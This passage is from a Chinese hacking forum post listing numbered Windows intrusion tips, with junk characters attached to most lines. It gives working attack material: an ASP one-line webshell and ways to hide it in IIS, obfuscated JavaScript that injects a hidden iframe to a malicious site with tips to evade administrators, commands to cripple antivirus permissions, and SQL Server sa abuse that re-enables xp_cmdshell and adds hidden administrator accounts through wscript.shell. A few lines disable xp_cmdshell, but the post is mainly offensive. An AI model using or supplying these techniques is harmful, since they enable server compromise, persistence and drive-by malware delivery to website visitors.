0 E% I" A& M( J' L% u) W: t- w执行后可以用AT命令查看新加的任务7 f# B) R* V2 C, d0 s) n+ W
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
! U5 G/ U! A% y/ O- `* r! S+ G. i! m7 r/ `: w5 P
53、隐藏ASP后门的两种方法' K1 v9 j1 E0 W/ s
1、建立非标准目录:mkdir images..\
* H; W3 o  [! O" Q拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp+ v4 b& I' }' n( k/ U2 s
通过web访问ASP木马:http://ip/images../news.asp?action=login
1 x  }& `' F0 |; K$ M, s如何删除非标准目录:rmdir images..\ /s1 P6 N9 V% P+ f1 R/ |1 f) Q: @
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
. c* w5 l* ^7 i0 U6 k; w2 S/ Kmkdir programme.asp/ j( j! `% l! r" l
新建1.txt文件内容:<!--#include file=”12.jpg”-->/ j7 g( @. l! j% s7 t
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
% l) c# h( F) \- Nattrib +H +S programme.asp
* ^2 B* h, \; O8 H' ~* i, L- ?+ i通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt0 v8 ]# V3 j0 T! @$ c5 ]# X

" e8 Y( C* j2 m6 n6 x54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
1 Y4 h7 _+ @/ H& X4 e' |  S! S然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
$ O1 F- {4 L/ s5 J) P
4 o+ h& [; U  z2 w7 _8 E1 V55、JS隐蔽挂马
7 h- K$ T8 l6 y2 C0 R+ y1.' O* T" n0 y- |7 A! k% j
var tr4c3="<iframe src=ht";
/ v' V- U0 i6 W% W. Z$ u' Utr4c3 = tr4c3+"tp:/";
8 ]% s0 V. `; K) Z9 b- Xtr4c3 = tr4c3+"/ww";
( K5 p7 m  }- y% btr4c3 = tr4c3+"w.tr4";
* D0 J; t, a- ?* `tr4c3 = tr4c3+"c3.com/inc/m";
' e) q4 v) O# e2 jtr4c3 = tr4c3+"m.htm style="display:none"></i";
+ r5 N* x* u! d7 j: [$ htr4c3 =tr4c3+"frame>'";* Z) r& M/ v* ?9 M( J
document.write(tr4c3);5 a; Q/ s( X' e9 t1 H# u
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
. ^5 T  ]$ Q7 S& a, o+ }$ M* B7 v2 J& X  z3 Q& ?& Y; _) ?, N7 Z
2.
* ~; `  k: g1 ]9 M* M转换进制,然后用EVAL执行。如
6 A* S0 U/ @, Beval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* R; E6 G, l- F) \; p5 c# F) D不过这个有点显眼。  m$ j; k% K1 F! }: z' S
3.4 z1 b+ c  v) D  h6 v( x2 C# p% e& W
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
+ `: [' V* P/ u% F/ d7 J% Q$ K最后一点,别忘了把文件的时间也修改下。
* ?  p) e+ A; \. b6 i" R& ^9 w6 h1 J
56.3389终端入侵常用DOS命令) P; V1 H! w$ K7 E- R
taskkill taskkill /PID 1248 /t
* N4 u* z6 g* J5 w' k% d4 F9 u' I
tasklist 查进程6 l3 |5 ]% Q6 D; C4 r
5 U9 m* {% d+ d1 P/ |( E% f( I& x5 w
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
' {  N) l- ^) K% V6 fiisreset /reboot% f, k5 C2 Y( h1 o  g
tsshutdn /reboot /delay:1    重起服务器- _& J/ j; ~( d  M, k

+ I1 N! B& B7 j: X4 ologoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,. Y4 V$ m/ p; T; ~6 W
6 A) n$ m/ F: u  P: V3 p: g
query user 查看当前终端用户在线情况% k- R0 v( J* l1 ^* B

% |, q  g- R2 d# b: ^3 F) \要显示有关所有会话使用的进程的信息,请键入:query process *# V& r: ?: F) n8 }! j
* t( f' j( ^) n8 V( g( _
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
- P; W6 v# Z7 w# |
7 z0 ?" _9 N/ f: _! _2 D4 ]( ?要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER23 Q0 M- d( E6 L  W
8 N! E6 s) z6 z7 ?4 ]) y
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 m4 L7 w6 o: k( H! \; |2 o9 d4 i- T
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
% y. @2 Z4 |3 b& I2 F& I+ y* o& F$ i1 S
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统* P1 A' r* A% [9 x2 @

6 l' J1 A9 f  T9 b命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
9 {5 r5 s; \3 m" Z" `
; e' ?" r6 j: I- r' Y/ i% g命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
5 K4 N1 e& q9 l  B* c/ S# m0 h3 V- g* [5 m' T* g
56、在地址栏或按Ctrl+O,输入:
: ?1 x* j9 y7 D4 z6 qjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
/ v9 M- F9 x( N4 ?$ h# ~6 J  q
4 L  @4 m- e. h, s源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。5 y3 \, f$ a8 i; r( T$ K$ m7 `, }
$ Z' l- |7 x4 V5 {0 k
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,! y7 {1 M' b" U" b
用net localgroup administrators是可以看到管理组下,加了$的用户的。
* n- Q' n' w9 Z' S1 q, U
% F2 b1 K: X- t4 s58、 sa弱口令相关命令% l, @# G/ j* Z' ]! e
7 H/ c; X2 r4 i, c+ q
一.更改sa口令方法:
' R0 ^  s  M' g5 b' S' H) H用sql综合利用工具连接后,执行命令:
& ~9 [8 B0 d$ L  ^% j: N7 M! Bexec sp_password NULL,'20001001','sa'3 h8 P' T* G1 k0 b& G
(提示:慎用!)& b. U- B/ \4 E3 A
/ z" }3 w5 S+ n  h
二.简单修补sa弱口令.
( h$ m4 U; e  p$ A$ ]" b9 ?+ w7 S6 b: E. `
方法1:查询分离器连接后执行:
, r7 U" S% r) g3 p! M$ l* T" Pif exists (select * from
* p5 `/ Q4 a" B) f7 a# [dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
, \; W* c+ ~2 Y/ f8 }OBJECTPROPERTY(id, N'IsExtendedProc') = 1)0 j1 N/ j  z' ]& ]! ~
$ e3 s0 w  r# K1 C) X
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'/ V- `) g$ T  l+ o1 G, Y
$ c0 e. Q$ {1 w
GO$ k/ C3 Z6 B0 f7 |% Q

" f. A4 N9 g4 a6 S1 p然后按F5键命令执行完毕: M  t& z/ |$ j* r" m: k, H+ l% J
/ p) Y5 ^9 U0 ~+ ?7 Z) j
方法2:查询分离器连接后
5 Q( q" Y% t3 n# E0 L# g第一步执行:use master
8 Z1 J; C3 w8 j' F第二步执行:sp_dropextendedproc 'xp_cmdshell'
( }, P4 A) B) h, r5 f1 s然后按F5键命令执行完毕! E4 y, F3 O' o- A

2 U6 w: b3 e" \/ p
; _  G" \  T3 [# ], H+ l0 w三.常见情况恢复执行xp_cmdshell.
( y7 ?0 z$ i6 F( f
4 ~/ e7 l9 i+ }
/ h3 p: H* M2 @! F1 未能找到存储过程'master..xpcmdshell'.
5 c0 H7 u  k$ M& W# D& V. U   恢复方法:查询分离器连接后,1 F2 P" @- T7 a. k, J5 Y
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
0 d" V& {1 o6 P' C$ z第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 f3 E) M; J% T# G7 O6 r7 g$ o& }然后按F5键命令执行完毕( A4 D* I) V1 r- X: \
* c9 A7 V# ?5 o
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
! Y+ C0 B( B7 F  ^  h# c恢复方法:查询分离器连接后,- g2 P0 p7 @1 w0 _. L! w
第一步执行:sp_dropextendedproc "xp_cmdshell"
, Q$ a" n% ^( g& W, R第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'2 L/ y' o+ Y: b. q) x
然后按F5键命令执行完毕
6 ?) P0 r0 |4 r9 N% b  M$ F( g; q  P  S1 s' j; p9 P4 d% l
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
+ Z: ^1 V0 n2 X$ q! m恢复方法:查询分离器连接后,
# W; `6 V2 z% s1 d+ P第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
/ T: v- _7 T* p4 K) ]2 b  U$ ^3 k第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           ! r- d0 y6 A+ ~& y3 w' W
然后按F5键命令执行完毕, {* u' q) G, n  ~" `
/ p' O3 Q+ a# E- _
四.终极方法.. ?1 h- j' U2 q$ w
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:. v2 W+ T$ d+ i1 L3 ^2 p* U0 h* Z
查询分离器连接后,4 K6 W. d) \( J- R/ h
2000servser系统:
! t- g2 L4 _# N9 ^" V4 o/ f! b/ ~declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'6 M' s5 U3 b; I% P# I9 ^
5 w* F. b# |% I5 O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'1 ~' \+ s. O6 }4 @: X$ ]
" T# d6 r" U# F# R; \
xp或2003server系统:
- W9 h( c2 ^% q  q( _! d  ]5 Q7 H7 H, Y
0 p6 n, [2 ]7 d5 s) y% udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'5 ^, R* L+ R$ P+ u
" ?1 @' E7 W; z' q/ {, {
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
- [* R" A6 v: Q* G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表